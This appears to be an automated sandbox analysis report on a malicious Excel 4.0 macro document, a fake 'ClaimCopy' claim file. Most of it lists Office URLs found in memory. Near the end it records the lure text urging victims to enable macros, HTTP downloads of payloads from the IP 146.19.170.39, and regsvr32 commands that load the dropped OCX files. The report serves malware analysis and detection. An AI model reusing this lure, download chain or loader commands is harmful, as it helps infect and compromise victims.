    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/initZh
    Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.coma
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comcB
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comj)
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.coml
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comlW
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comn
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.como
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comx
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://tasks.office.com
    Source: EXCEL.EXEString found in binary or memory: https://tellmeservice.osi.office.net
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/F
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlMe
    Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicest
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://webshell.suite.office.com
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.comb
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosgW
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://wus2.contentsync.
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msC
    Source: global trafficHTTP traffic detected: GET /710276824738.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.19.170.39Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /710276824738.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.19.170.39Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 16Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcmwARNNG Thisfileorigin
    Source: Screenshot number: 16Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Screenshot number: 16Screenshot OCR: Enable Macros ) Why I can not open this document? Shet ' 'I I El m m I i '00% Type here to se
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: ClaimCopy-46148734-12012021.xlsbInitial sample: EXEC
    Found protected and hidden Excel 4.0 Macro sheetShow sources
    Source: ClaimCopy-46148734-12012021.xlsbInitial sample: Sheet name: Tiposa1
    Source: ClaimCopy-46148734-12012021.xlsbInitial sample: Sheet name: Tiposa
    Source: ClaimCopy-46148734-12012021.xlsbMacro extractor: Sheet name: Tiposa1
    Source: ClaimCopy-46148734-12012021.xlsbMacro extractor: Sheet name: Tiposa
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: ClaimCopy-46148734-12012021.xlsbReversingLabs: Detection: 22%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
